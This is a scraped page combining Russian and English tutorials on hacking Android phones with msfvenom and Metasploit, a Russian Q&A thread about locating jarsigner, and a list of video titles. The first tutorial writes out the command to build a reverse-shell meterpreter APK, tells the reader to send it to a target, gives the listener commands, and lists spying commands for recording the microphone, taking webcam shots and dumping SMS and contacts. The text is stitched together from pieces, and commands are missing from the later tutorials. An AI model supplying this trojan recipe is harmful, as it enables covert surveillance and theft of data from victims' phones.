- Hack Android Mobile Phone using MSFVenom Kali Linux
- Краткое руководство: Как взломать андроид с Kali Linux
- Предпосылки для взлома Android
- Шаги для взлома Android
- Выполнение apk на андроиде.
- Quick Guide: How To hack android with Kali Linux
- Prerequisite for Hack Android
- Steps to hack Android
- Execution of apk on android.
- Где jarsigner?
- Install jarsigner in kali linux 2020 jarsigner installation in linux kali linux msfconsole
Hack Android Mobile Phone using MSFVenom Kali Linux
In this tutorial, you will learn how to Hack any Android mobile phone using MSFVenom.
Requirements
Linux Based Operating System (In this tutorial we are using Kali Linux 2017.2)
Metasploit Framework
MSFVenom is a hacking tool that targets the Android operating system. The tool is a combination of MSFEncode & MSFPayload.
Ok now let’s get started open up a new command terminal and enter the command listed below (this command sets our payload and creates our custom executable).
# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=4444 R > hack.apk
If you don’t know what your LHOST is you can look it up using ifconfig.
You have now finished creating your malicious .apk file it will be saved to your /home/ folder. Locate your newly created .apk and send it to your target (hack.apk).
Now we need to start the Metasploit framework and set up a multi handler. This is a special payload, as typically a Meterpreter payload is multistage, where a minimal amount of code is sent as part of the exploit, and then more code is uploaded after code execution has been accomplished.
Open up a new terminal and use the following command to start Metasploit framework once the console has started set up your multi/handler.
msf > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.4
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit
When the target clicks on the malicious app from the Android Main Activity Menu a session between Metasploit and the Android phone will be established. To list new sessions you can use command sessions -i to connect to a new session use command sessions -i 1 replacing 1 with the session id you want to connect with.
You may like to try out some of these useful Exploit commands :
– record_mic
– webcam_snap
– webcam_stream
– dump_contacts
– dump_sms
– geolocate
Signing Methods
Keytool (Comes Pre-Installed in Kali Linux)
Jarsinger (Comes Pre-Installed in Kali Linux)
Zipalign (Does not come pre-installed in Kali Linux)
Install Zipalign
Alternatively, if you prefer to sign your .apk file directly from your Android device you can sign your .apk files with ZipSigner an Android app that signs update.zip files, APK, or JAR files using your own private keys or one of the four built-in certificates (media, platform, shared, testkey). All output are automatically zip-aligned. ZipSigner is an app combination of jarsigner, signapk, keytool, and zipalign.
We have now come to the end of this tutorial enjoy please consider sharing this tutorial with your friends and on social media.
If you have found a spelling error, please, notify us by selecting that text and pressing Ctrl+Enter.
Источник
Краткое руководство: Как взломать андроид с Kali Linux
Предпосылки для взлома Android
Шаги для взлома Android
1. Создать Payload
Чтобы создать троян для взлома Android, нам нужно создать полезную нагрузку, используя утилиту msfvenom в Kali Linux.
В приведенной выше команды LHOST задан IP, используется в команде ifconfig от Kali Linux.
Вышеуказанная команда создает троянский файл apk, который будет установлен на целевой телефон для использования, однако перед этим мы должны подписать этот apk для правильной установки. Следуйте шагам ниже по списку для этого.
а. Создание хранилища ключей:
Выше команда спрашивает вопросы и пароль.
б. Подписать созданный файл с помощью jarsigner apk.
с. Проверьте apk, созданный с помощью jarsigner.
д. Оптимизация файла с помощью zipalign apk.
Перед тем как начать работу, установите zipalign с помощью команды ниже:
Теперь позвольте оптимизировать apk.
Таким образом, наш окончательный apk, который мы используем для взлома андроида назван как «my0704_sign.apk».
2. Запустите msfconsole на Kali Linux для эксплуатации телефона Android.
В приведенной выше строке msf запустить полезную нагрузку на андроид и мультиобработчик команд exploit с помощью ниже:
В команде ниже мы используем IP Kali Linux, может быть взят с помощью команды ifconfig на Kali Linux. Кроме того, мы используем номер порта 4444 для эксплуатации.
А затем, наконец, использовать команду, которая будет ждать исполнения apk на телефоне Android.
Выполнение apk на андроиде.
Здесь мы используем Android эмулятор предоставленный Google. Следовательно , вам необходимо загрузить образ ISO с сайта Google.
После загрузки вы можете создать нормальную виртуальную машину VMware и смонтировать этот ISO на виртуальной машине, чтобы запустить виртуальную машину машину. Настройка Android VM с помощью id gmail.
Источник
Quick Guide: How To hack android with Kali Linux
In my earlier Post you we have learned how to hack windows using Kali Linux. This time we are going to hack android with Kali Linux. We are making use of msfvenom tool within Kali linux which is best combination of Msfpayload and Msfencode.
NOTE: This tutorial is for educational purpose only.
Prerequisite for Hack Android
- Kali Linux
- Android Phone : For demonstration purpose we have used Android emulator provided by Google.
Steps to hack Android
1. Create Payload
To create Trojan for the android hack we need to create payload using msfvenom utility with Kali linux.
In the above command LHOST ip specified is used within the ifconfig command from Kali Linux.
The above command create trojan apk file which can be installed on the target phone to exploit , however before this we need to sign this apk for proper installation. Follow below list of steps for the same.
a. Create Keystore:
Above command asks about the list of question and password.
b. Sign the created apk file using jarsigner.
c. Verify the apk created using jarsigner.
d. Optimize the apk file using zipalign.
Before proceeding, install zipalign using command below:
Now lets optimize the apk.
So our final apk which we are using to hack android is named as “my0704_sign.apk”.
2. Start the msfconsole on Kali Linux for exploiting the android phone.
In the above msf prompt launch the android payload and multi handler exploit using commands below:
In the command below we are using Kali linux ip for exploit can be taken from ifconfig command on Kali Linux. Also we are using port number 4444 for exploit.
And then give finally exploit command which will wait till execution of apk on the android phone.
Execution of apk on android.
Here we are using the Android emulator provided by Google. Hence you need to download the ISO image from this website.
Once downloaded you can create normal virtual machine in vmware and mount this iso on vm to start the vm machine. Setup android vm using your gmail id.
Источник
Где jarsigner?
У меня Android SDK установлен на обеих машинах Linux, используя открытый SuSE 12.1. Я использовал обе машины для успешной сборки приложений Android много раз и подписал их как с отладочным ключом для тестирования, так и с ключом выпуска из моего собственного хранилища ключей, поэтому он должен быть где-то на каждой машине.
Тем не менее, возвращается некорректная команда на обеих машинах. Я просмотрел папку Android SDK, папку JDK в Windows и / usr / lib64 / jvm /, но это нигде не было.
Я предполагаю, что это должно быть под другим именем. Я также запускаю:
По всей системе на Linux-сервере без успеха.
Он находится в папке bin вашего java JDK install (Java SE). Если у вас установлена только JRE, у вас ее, вероятно, нет.
% JAVA_HOME% \ Bin \ Jarsigner
Вы можете найти там jarsigner. Сначала установите jdk.
Для потомков, если вы пытаетесь на самом деле использовать jarsigner для подписания файла jar (например, апплета) с хранилищем ключей, вам нужно будет ссылаться на jarsigner во время выполнения команды из папки, в которой находится хранилище ключей:
Вышеприведенное может быть очевидным, но мне потребовалось несколько попыток, потому что я пытался вызвать jarsigner, находясь внутри папки JDK, которая не знала, где находится мое хранилище ключей (в каталоге jre!), Поэтому я надеюсь, что это поможет тем Которые хотели бы видеть пригодный для использования синтаксис для этой ситуации.
Если вы не можете найти его, скачайте и установите Java JDK отсюда
Эта ошибка возникает, когда у вас только JRE установлен вместо JDK в переменной JAVA_HOME. К сожалению, вы не можете установить оба из них в одну и ту же переменную, поэтому вам просто нужно перезаписать переменную с новым пути установки JDK.
Этот процесс должен быть таким же, как и у установленного JRE
Если вы находитесь на Mac или Linux, просто зайдите на терминал и введите:
Источник
Install jarsigner in kali linux 2020 jarsigner installation in linux kali linux msfconsole
Jarsigner — How to install Jarsigner to sign apk files.Подробнее
Jar Signer:Download and install Jar Signer in Kali linux 1min Video 🔥Подробнее
how to install apktool on kali linux #kalilinux #apktoolinstallinkalilinuxПодробнее
Error: jarsigner not found. If it’s not in your PATH, please add it. | HOW TO fixПодробнее
Install android hacking tools in Kali Linux | Install Jarsigner/Apktool/ZipalignПодробнее
How to Hack Webcam, Microphone & get Mobile Location using a LinkПодробнее
Solve msfconsole not working on Kali LinuxПодробнее
openjdk install in kali linux — install java 8 / openjdk8 on kali linux all ( debian )Подробнее
Cómo instalar Jarsigner en Kali Linux 2020.2Подробнее
How To Metasploit android on Kali NetHunter 3.0 (Hacking?)Подробнее
Installing TheFatRat on Kali Linux | New | 2020Подробнее
How To Download & Install Metasploit Framework in KALI LINUX 2021 | KALI LINUX TutorialПодробнее
how to install tools from GitHub in kali LinuxПодробнее
Access Android with Metasploit Kali (Cybersecurity)Подробнее
Installing Bettercap in Kali Linux 2018Подробнее
How to install Metasploit in Kali Linux #TutorialПодробнее
Download Metasploit on Linux Debian / Ubuntu / Mint with TermenalПодробнее
Solucion al error «cannot load such file bundler/setup metasploit» en Kali Linux,no abre MetasploitПодробнее
Unable to rebuilt apk with apktool! kali linux fix errorsПодробнее
Hacking Android using Metasploit || Kali Linux TutorialПодробнее
Источник